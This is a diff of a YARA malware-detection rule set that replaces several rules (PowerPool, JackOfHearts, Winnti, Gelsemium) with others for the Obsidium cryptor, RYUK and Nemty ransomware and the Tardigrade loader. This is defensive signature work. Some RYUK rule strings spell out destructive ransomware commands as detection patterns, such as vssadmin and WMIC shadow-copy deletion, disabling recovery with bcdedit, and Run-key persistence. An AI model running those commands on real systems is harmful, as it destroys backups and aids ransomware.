-		uint16( 0 ) == 0x5a4d and filesize > 25KB and 5 of ( $s* )
+		uint16( 0 ) == 0x4d5a and filesize > 50KB and 6 of them
 }
-rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_2 : FILE
+rule ARKBIRD_SOLG_Mem_Cryptor_Obsidium_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect PowerPool malware (ALPC exploit variant)"
+		description = "Detect Obsidium cryptor by memory string"
 		author = "Arkbird_SOLG"
-		id = "2988e9a8-da43-51fb-bd39-44aa1d161120"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_2.yara#L1-L23"
+		id = "039c45f0-cc43-50ee-ae4e-a7e0e220dc04"
+		date = "2020-10-25"
+		modified = "2020-10-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Mem_Cryptor_Obsidium_Oct_2020_1.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "07d7a6444ddccbf4887de18659147354c9961092bb07ee0148392035a6d27086"
+		logic_hash = "5f471064505d7ab634b6d52f66fa0a96682af2eb1dd41afe4449543253c6bbf7"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		hash1 = "035f97af0def906fbd8f7f15fb8107a9e852a69160669e7c0781888180cd46d5"
-		hash2 = "a72cdb6be7a967d3aa0021d2331b61af84455539e6f127720c9aac9b8392ec24"
-		hash3 = "df7b9d972ac83cc4a590f09d74cb242de3442cc9c1f19ed08f62bd6ebc9fc0fd"
-		tlp = "White"
-		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
-		$s2 = { 2f 00 3f 00 69 00 64 00 3d 00 25 00 73 00 26 00 69 00 6e 00 66 00 6f 00 3d 00 25 00 73 }
-		$s3 = { 72 00 61 00 72 00 2e 00 65 00 78 00 65 00 20 00 61 00 20 00 2d 00 72 00 20 00 25 00 73 00 2e 00 72 00 61 00 72 00 20 00 2d 00 74 00 61 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 20 00 2d 00 74 00 62 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 }
-		$s4 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 24 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 54 00 61 00 62 00 6c 00 65 00 2e 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 }
-		$s5 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 }
-		$s6 = { 83 c4 04 53 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 0c 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 08 83 7c 24 20 00 68 40 01 00 00 74 61 33 ed 55 68 88 ?? 43 00 e8 ?? a4 00 00 b8 50 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 3b cd 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 3b cd 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 90 ?? 42 00 f3 a4 e8 [2] 00 00 83 c4 04 33 f6 89 74 24 20 eb 66 6a 00 68 88 ?? 43 00 e8 ?? a4 00 00 b8 f0 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 85 c9 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 85 c9 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 98 ?? 42 00 f3 a4 e8 ?? 95 00 00 c7 44 24 24 01 00 00 00 8b 74 24 24 83 c4 04 33 ed 68 d0 07 00 00 a3 d4 ?? 42 00 }
+		$s1 = "Obsidium\\" fullword ascii
+		$s2 = "obsidium.dll" fullword ascii
+		$s3 = "Software\\Obsidium" fullword ascii
+		$s4 = "winmm.dll" fullword ascii
+		$s5 = "'license.key" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Jackofhearts_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_2 : FILE
 {
 	meta:
-		description = "Detect JackOfHearts malware"
+		description = "Detect RYUK ransomware (Sept_2020_V1 + V2)"
 		author = "Arkbird_SOLG"
-		id = "42d5eadb-dd94-5a15-8a0d-d1e56b58ce2e"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_JackOfHearts_Jul_2021_1.yara#L1-L23"
+		id = "82ed6736-00e6-5a30-89cf-a2b86f2e1ba6"
+		date = "2020-10-25"
+		modified = "2020-10-28"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_2.yar#L1-L29"
 		license_url = "N/A"
-		logic_hash = "6cad69beb7c104ef19beb26ca42b923283a0303c230e30b48dde58f88af4cd42"
+		logic_hash = "a06d61b9363b732d17a2766b280951198a6adc226e284ab1d909cd98516cfb6f"
 		score = 75
-		quality = 73
+		quality = 46
 		tags = "FILE"
-		hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		hash1 = "d0d7a8f588693b7cc967fb4069419125625eb7454ba553c0416f35fc95307cbe"
+		hash2 = "d7333223dcc1002aae04e25e31d8c297efa791a2c1e609d67ac6d9af338efbe8"
+		hash3 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b"
+		hash4 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8"
+		hash5 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399"
+		hash6 = "5b1f242aee0eabd4dffea0fe5f08aba60abf7c8d1e4f7fc7357af7f20ccd0204"
 
 	strings:
-		$s1 = "%appdata%" fullword ascii
-		$s2 = "%temp%" fullword ascii
-		$s3 = { 43 3a 5c 55 73 65 72 73 5c [2-10] 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c }
-		$s4 = "CreateServiceA" fullword ascii
-		$s5 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
-		$s6 = "\\VarFileInfo\\Translation" fullword wide
-		$s7 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 }
-		$s8 = "\\SetupUi" fullword wide
-		$s9 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 }
-		$s10 = "%s.tmp" fullword wide
+		$s1 = "Type Descriptor'" fullword ascii
+		$s2 = "Class Hierarchy Descriptor'" fullword ascii
+		$s3 = "GET:PV" fullword ascii
+		$s4 = "Base Class Descriptor at (" fullword ascii
+		$s5 = "Complete Object Locator'" fullword ascii
+		$s6 = "UINi\\cYIqwxAcV^GYCY^EgzUvSZcsRW" fullword ascii
+		$s7 = "FrystFsgcteIaui" fullword ascii
+		$s8 = "delete[]" fullword ascii
+		$s9 = "Picuovphv Bbsg!Es|rwojrarkkd Stryjfes x4.3" fullword ascii
+		$s10 = "FrystGfuvrozHctj" fullword ascii
+		$s11 = "FrystUfngasfCqovf{v" fullword ascii
+		$op1 = { 63 62 6d 75 6a 7a 6e 49 4d 54 50 78 75 70 78 59 6f 65 71 4f 57 48 4a 78 57 71 4c 50 55 78 4a 6e 68 4b 71 57 57 6d 49 75 6a 51 64 4f 50 74 70 63 76 61 42 72 75 5a 6a 4d 69 79 59 52 69 58 78 4a 63 6b 51 70 4b 75 47 52 5a 51 42 5a 5a 61 50 69 76 66 77 43 6c 45 5a 67 76 6e 49 6c 54 74 4b 46 4d 68 53 4a 42 4f 64 6a 69 46 44 4d 62 70 78 76 52 5a 69 61 74 69 71 5a 6e 75 67 5a 62 78 72 51 }
+		$op2 = { 23 71 59 72 51 6d 58 48 4a 77 65 55 53 76 68 79 4f 62 51 50 6d 44 44 52 44 6e 72 49 53 57 6c 72 56 4a 56 75 68 52 4e 4a 66 6b 50 6e 6b 72 65 68 73 6e 6b 68 54 4e 70 6a 56 7a 7a 64 61 44 6e 62 44 67 5a 54 62 4b 65 63 54 69 35 4f 71 20 64 24 2d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 7 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 6 of ( $s* ) and 1 of ( $op* )
 }
-rule ARKBIRD_SOLG_APT_Winnti_Elfx64_Aug_2020_1 : FILE
+rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect of ELF implant used by APT Winnti in August 2020"
+		description = "Detect RYUK ransomware (Sept_2020_V1)"
 		author = "Arkbird_SOLG"
-		id = "112e8d60-cbcb-53a7-b458-d39ee03d5c22"
-		date = "2020-08-18"
-		modified = "2020-08-18"
-		reference = "https://twitter.com/KorbenD_Intel/status/1295725146037133312"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-18/Winnti/APT_Winnti_ELFx64_Aug_2020_1.yar#L1-L34"
+		id = "7ade43ef-cd31-5308-b5ab-71f04d27018b"
+		date = "2020-10-25"
+		modified = "2020-10-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_1.yar#L1-L29"
 		license_url = "N/A"
-		logic_hash = "ebe6e60c45336476fd91c4185eee0414c3eba83960301a610b69c8818dbb17fd"
+		logic_hash = "b70eb2e5f58076ea8d4d1370649358acf68f3119cb2be6d5ef0a302bb3bf5d1e"
 		score = 75
-		quality = 36
+		quality = 75
 		tags = "FILE"
-		hash1 = "6af8b3d31101f48911b13e49c660c10ed1d26b60267e8037d2ac174fc0d2f36c"
+		hash1 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b"
+		hash2 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8"
+		hash3 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399"
 
 	strings:
-		$lib1 = "/usr/bin/python2.7" fullword ascii
-		$lib2 = "libxselinux" fullword ascii
-		$c1 = "/cmdlineH" fullword ascii
-		$c2 = "/proc/%d/fd/%s" fullword ascii
-		$c3 = "/proc/self/exe" fullword ascii
-		$c4 = "__gmon_start__" fullword ascii
-		$c5 = "_ITM_registerTMCloneTable" fullword ascii
-		$c6 = "_ITM_deregisterTMCloneTable" fullword ascii
-		$d1 = "/usr/bin/netstat" fullword ascii
-		$d2 = "/var/run/libudev.pid" fullword ascii
-		$d3 = "/sbin/ifup-local" fullword ascii
-		$s1 = "EAEC2CA4-AF8D-4F61-8115-9EC26F6BF4E1" fullword ascii
-		$s2 = "readdir64" fullword ascii
-		$s3 = ".note.gnu.gold-version" fullword ascii
-		$s4 = ".note.gnu.build-id" fullword ascii
-		$s5 = ".eh_frame_hdr" fullword ascii
-		$s6 = "xlstat" fullword ascii
-		$s7 = "1YZ[\\<@nYSLRR]H_PGX[XmYXGFrstuvwxyz{|}~" fullword ascii
-		$info1 = "check_is_our_proc_dir" fullword ascii
-		$info2 = "get_our_sockets" fullword ascii
-		$info3 = "is_invisible_with_pids" fullword ascii
-		$info4 = "check_if_number" fullword ascii
-		$info5 = "get_our_pids" fullword ascii
+		$c1 = "\" /TR \"C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,50) do start wordpad.exe /p " fullword ascii
+		$c2 = "cmd.exe /c \"bootstatuspolicy ignoreallfailures\"" fullword ascii
+		$c3 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$c4 = "cmd.exe /c \"WMIC.exe shadowcopy delete\"" fullword ascii
+		$c5 = "cmd.exe /c \"vssadmin.exe Delete Shadows /all /quiet\"" fullword ascii
+		$c6 = "cmd.exe /c \"bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\"" fullword ascii
+		$r1 = "/C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /t REG_SZ /d \"" fullword wide
+		$r2 = "/C REG DELETE \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /f" fullword wide
+		$ref1 = "lsaas.exe" fullword wide
+		$ref2 = "Ncsrss.exe" fullword wide
+		$ref3 = "$WGetCurrentProcess" fullword ascii
+		$ref4 = "lan.exe" fullword wide
+		$ref5 = "explorer.exe" fullword wide
+		$ref6 = "Ws2_32.dll" fullword ascii
+		$p1 = "\\users\\Public\\sys" fullword wide
+		$p2 = "\\Documents and Settings\\Default User\\sys" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 15KB and ( 1 of ( $lib* ) and 4 of ( $c* ) and 2 of ( $d* ) and 4 of ( $s* ) and 3 of ( $info* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $c* ) and 1 of ( $r* ) and 4 of ( $ref* ) and 1 of ( $p* )
 }
 rule ARKBIRD_SOLG_MAL_ELF_Rekoobe_Nov_2021_1 : FILE
 {
@@ -150352,35 +151077,65 @@ rule ARKBIRD_SOLG_MAL_ELF_Rekoobe_Nov_2021_1 : FILE
 	condition:
 		uint32( 0 ) == 0x464C457F and filesize > 100KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Tardigrade_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect Gelsenicine malware (Loader - Variant 1)"
+		description = "Detect Tardigrade loader"
 		author = "Arkbird_SOLG"
-		id = "36276150-a5dd-5385-9e50-958a6fa54de5"
+		id = "f6c8014a-21dd-5ebd-9edd-7a9f649a43a0"
+		date = "2021-11-22"
+		modified = "2021-11-23"
+		reference = "https://www.isac.bio/post/tardigrade"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-22/APT_Tardigrade_Nov_2021_1.yara#L1-L19"
+		license_url = "N/A"
+		logic_hash = "98358d9dbf62e653b136268d8694ed4d7f48c80125dd12ccea5f36ff5c6b4a3c"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "1c7c1a28921d81f672320e81ad58642ef3b8e27abf8a8e51400b98b40f49568be"
+		hash2 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858"
+		hash3 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe"
+		tlp = "white"
+		adversary = "Tardigrade"
+
+	strings:
+		$s1 = { 63 6d 64 2e 65 78 65 20 2f 63 20 65 63 68 6f 20 [10-40] 3e 22 25 73 22 26 65 78 69 74 }
+		$s2 = { 4c 89 44 24 38 89 54 24 34 48 89 4c 24 28 e8 [2] 01 00 e8 [2] 01 00 4c 8b 44 24 38 8b 54 24 34 48 8b 4c 24 28 48 83 c4 48 e9 71 fe ff ff 90 48 89 ca 48 8d 0d 76 ?? 02 00 }
+		$s3 = { 41 57 41 56 41 55 41 54 55 57 56 53 48 ?? ec [1-4] 48 8b 84 24 ?? 00 00 00 48 89 44 24 60 48 8b 05 [2] 01 00 48 89 4c 24 40 ?? 38 }
+		$s4 = { 45 31 c0 48 8d 8c 24 ?? 02 00 00 4c 8d 8c 24 ?? 01 00 00 48 8d 15 [2] 01 00 ff 15 [2] 02 00 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and all of them
+}
+rule ARKBIRD_SOLG_RAN_Nemty_June_2021_1 : FILE
+{
+	meta:
+		description = "Detect Nemty ransomware"
+		author = "Arkbird_SOLG"
+		id = "1c7994b8-7479-5679-91a5-e3ca4b2e7fde"
 		date = "2021-06-12"
-		modified = "2021-06-14"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_1.yara#L1-L19"
+		modified = "2021-06-13"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-12/Nemty/RAN_Nemty_June_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "66d9fad7105b46a55db11c5224b1a395793f2dee89f779d59c80b2f7cda5a115"
+		logic_hash = "25a9e82ae1e950e1c71d6dfa120efd1a2ba39cbf8e9c2cd4ba4e67ce7dabc45e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "97982e098a4538d05e78c172c9bbc5b412754df86dc73e760004f0038ec928fb"
-		hash2 = "46338cae732ee1664aac77d9dce57c4ff8666460c1a51bee49cae44c86e42df9"
-		hash3 = "f0d23aa026ae6ba96051401dc2b390ba5c968d55c2a4b31a36e45fb67dfc2e3c"
+		hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6"
+		hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390"
+		hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3"
 		tlp = "white"
-		adversary = "Gelsemium"
+		adversary = "RAAS"
 
 	strings:
-		$s1 = { b8 [3] 74 e8 [2] 00 00 81 ec bc 03 00 00 53 56 57 be [3] 74 8d bd 38 fc ff ff 6a 1b a5 a5 a5 a5 66 a5 59 33 c0 8d bd 4a fc ff ff be [3] 74 f3 ab 66 ab 8d bd b8 fc ff ff 6a 1c a5 a5 a5 a5 59 33 c0 8d bd c8 fc ff ff 6a 07 f3 ab 59 be [3] 74 8d bd 38 fd ff ff 6a 18 f3 a5 66 a5 8b 5d 0c 59 8d bd 56 fd ff ff 83 65 cc 00 f3 ab 66 ab 8a 03 6a 00 8d 4d e0 c7 45 c0 24 00 00 00 c7 45 c4 25 00 00 00 c7 45 c8 23 00 00 00 88 45 e0 ff 15 [3] 74 a1 [3] 74 8d 4d e0 ff 30 6a 00 53 ff 15 [3] 74 8a 45 0f 6a 00 8d 4d d0 c7 45 fc 01 00 00 00 88 45 d0 ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8d 4d d0 ff 15 [3] 74 8b 55 d4 8b 0d [3] 74 85 d2 c6 45 fc 02 75 02 8b d1 8b 43 04 85 c0 75 02 8b c1 ff 75 d8 52 50 ff 15 [3] 74 83 c4 0c 85 c0 0f 85 d9 00 00 00 8d 85 b8 fd ff ff 50 68 04 01 00 00 ff 15 [3] 74 8d 85 b8 fd ff ff 50 ff d6 85 c0 59 0f 84 b5 00 00 00 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 2f 59 74 56 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 5c 59 74 41 8d 4d e0 ff 15 [3] 74 8b 7d e4 8b 5d d8 8d 4d e0 ff 15 [3] 74 8b 45 e4 89 45 f0 8d 85 b8 fd ff ff 50 ff d6 59 8d 84 45 b8 fd ff ff 50 8d 85 b8 fd ff ff 50 8d 44 5f fe 50 ff }
-		$s2 = { ff 75 0c 89 45 f0 ff d6 50 ff 75 0c ff 75 f0 ff 15 [3] 74 83 c4 10 85 c0 }
-		$s3 = "pluginkey" fullword wide
-		$s4 = { 55 8b ec 51 33 c0 56 f6 05 [3] 74 01 89 45 fc 0f 85 c6 00 00 00 8a 4d 0b 80 0d [3] 74 01 53 bb [3] 74 57 88 0d [3] 74 50 8b cb ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 68 [2] e2 74 e8 [2] 00 00 59 5f 33 c0 5b 8b 75 08 8a 4d 0b 68 [3] 74 68 [3] 74 88 0e 50 8b ce 89 46 04 89 46 08 89 46 0c e8 [2] 00 00 8b c6 5e }
+		$s1 = { 83 f8 1a 0f 8d [2] 00 00 [0-1] 89 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [1-15] 00 00 00}
+		$s2 = { 5a 4c 49 42 00 00 00 00 00 00 01 ?? 78 01 54 8f [3] 40 [2] cf }
+		$s3 = { 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [12-25] 00 81 }
+		$s4 = { ff ff [0-1] 8d 05 [3] 00 [0-1] 89 04 24 [0-1] c7 44 24 ?? 02 00 00 00 e8 [2] ff ff e8 [2] ff ff [0-1] 8b 4c 24 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 15KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 500KB and all of ( $s* )
 }
 rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_2 : FILE
 {
@@ -150412,35 +151167,6 @@ rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_2 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize > 30KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Gelsemium_Gelsevirine_June_2021_1 : FILE
-{
-	meta:
-		description = "Detect Gelsevirine malware (Main Plug-in)"
-		author = "Arkbird_SOLG"
-		id = "31900186-2531-5558-aafb-67707040ddaf"
-		date = "2021-06-12"
-		modified = "2021-06-14"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsevirine_June_2021_1.yara#L1-L18"
-		license_url = "N/A"
-		logic_hash = "06e7ee49092621c8469eeb1cd9e5cc1420a1879084e0d0a39181dc046bfa00cf"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "1a9d78e5c255de239fb18b2cf47c4c2298f047073299c27fb54a0edf08a1d5a1"
-		hash1 = "51b9296ff1f562350cd63abd22c6032ef26d5ae6a3e2e5e0f851d8b1a5d0ee35"
-		tlp = "white"
-		adversary = "Gelsemium"
-
-	strings:
-		$s1 = { 48 8b c4 55 41 56 41 57 48 8d a8 38 fa ff ff 48 81 ec b0 06 00 00 48 c7 85 a0 02 00 00 fe ff ff ff 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 60 20 48 8b 05 68 bf 0b 00 48 33 c4 48 89 85 a0 05 00 00 45 33 e4 4c 89 65 08 4c 89 65 10 44 89 64 24 20 48 8d 54 24 20 48 8d 4d 08 e8 30 96 01 00 90 48 c7 85 f8 00 00 00 07 00 00 00 4c 89 a5 f0 00 00 00 66 44 89 a5 e0 00 00 00 45 8d 44 24 04 48 8d 15 79 d8 08 00 48 8d 8d e0 00 00 00 e8 dd b0 00 00 90 48 8d 8d e0 00 00 00 e8 50 30 ff ff 90 48 83 bd f8 00 00 00 08 72 0d 48 8b 8d e0 00 00 00 ff 15 b0 32 06 00 48 c7 85 b8 01 00 00 07 00 00 00 4c 89 a5 b0 01 00 00 66 44 89 a5 a0 01 00 00 41 b8 10 00 00 00 48 8d 15 61 d6 08 00 48 8d 8d a0 01 00 00 e8 85 b0 00 00 90 48 8d 95 a0 01 00 00 48 8d 8d 80 05 00 00 e8 41 96 01 00 90 48 83 bd b8 01 00 00 08 72 0d 48 8b 8d a0 01 00 00 ff 15 51 32 06 00 48 c7 85 68 04 00 00 07 00 00 00 4c 89 a5 60 04 00 00 66 44 89 a5 50 04 00 00 48 c7 85 78 01 00 00 07 00 00 00 4c 89 a5 70 01 00 00 66 44 89 a5 60 01 00 00 49 83 ce ff 4d 8b ce 45 33 c0 48 8d 95 80 05 00 00 48 8d 8d 60 01 00 00 e8 c8 ae 00 00 90 48 8d 95 60 01 00 00 48 8d 8d e0 01 00 00 e8 e4 5b ff ff 90 48 8d 8d 50 04 00 00 48 3b c8 74 15 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 50 04 00 00 e8 92 ae 00 00 48 8d 8d 50 04 00 00 e8 b6 11 ff ff 90 48 83 bd f8 01 00 00 08 72 0d 48 8b 8d e0 01 00 00 ff 15 a6 31 06 00 48 c7 85 f8 01 00 00 07 00 00 00 4c 89 a5 f0 01 00 00 66 44 89 a5 e0 01 00 00 48 83 bd 78 01 00 00 08 72 0d 48 8b 8d 60 01 00 00 ff 15 75 31 06 00 33 d2 48 8d 8d 50 04 00 00 e8 5f 2b 04 00 48 c7 85 58 01 00 00 07 00 00 00 4c 89 a5 50 01 00 00 66 44 89 a5 40 01 00 00 41 b8 0d 00 00 00 48 8d 15 b8 e2 08 00 48 8d 8d 40 01 00 00 e8 3c af 00 00 90 e8 96 2d ff ff 48 8d 48 30 48 8d 95 40 01 00 00 e8 b6 77 00 00 48 8b c8 e8 fe dc 02 00 48 8b c8 e8 16 d5 ff ff 90 48 83 bd 58 01 00 00 08 72 0d 48 8b 8d 40 01 00 00 ff 15 f6 30 06 00 48 c7 85 18 01 00 00 07 00 00 00 4c 89 a5 10 01 00 00 66 44 89 a5 00 01 00 00 41 b8 24 00 00 00 48 8d 15 d7 e3 08 00 48 8d 8d 00 01 00 00 e8 cb ae 00 00 90 48 8d 8d 00 01 00 00 e8 ce 6b 00 00 84 c0 0f 94 c3 48 83 bd 18 01 00 00 08 72 0d 48 8b 8d 00 01 00 00 ff 15 9a 30 06 00 84 db 0f 84 36 08 00 00 4c 89 a5 88 04 00 00 4c 89 a5 90 04 00 00 e8 f7 3b 01 00 48 89 85 88 04 00 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 41 b8 0b 00 00 00 48 8d 15 2a d6 08 00 48 8d 4d 38 e8 59 ae 00 00 90 e8 b3 2c ff ff 48 8d 48 30 48 8d 55 38 e8 96 75 00 00 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 98 04 00 00 e8 d7 ac 00 00 90 48 83 7d 50 08 72 0a 48 8b 4d 38 ff 15 fd 2f 06 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 4c 89 a5 b8 04 00 00 4c 89 a5 c0 04 00 00 4c 89 a5 c8 04 00 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 41 b8 01 00 00 00 48 8d 15 0d e3 08 00 48 8d 4d e8 e8 b8 ad 00 00 90 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 41 b8 0d 00 00 00 48 8d 15 e9 e2 08 00 48 8d 4d a8 e8 90 ad 00 00 90 e8 ea 2b ff ff 48 8d 48 30 48 8d 55 a8 e8 cd 74 00 00 48 8b d0 4c 8d 45 e8 48 8d 8d b8 04 00 00 e8 1a 55 01 00 90 48 83 7d c0 08 72 0a 48 8b 4d a8 ff 15 50 2f 06 00 48 c7 45 c0 07 00 00 